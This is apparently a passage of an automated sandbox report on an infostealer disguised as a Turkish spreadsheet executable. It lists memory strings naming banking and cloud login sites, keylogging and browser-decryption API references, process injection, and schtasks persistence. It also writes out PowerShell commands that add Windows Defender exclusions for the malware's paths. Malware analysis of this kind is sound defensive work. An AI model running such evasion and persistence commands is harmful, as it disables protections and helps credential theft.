Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596650
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596345
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595781
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595662
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595437
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595216
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595109
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594997
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594890
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594781
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594671
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594562
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594452
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594344
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594234

Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: YzkHZRBcm.exe, 0000000E.00000002.3799105422.00000000011B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3800026605.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory written: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Memory written: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
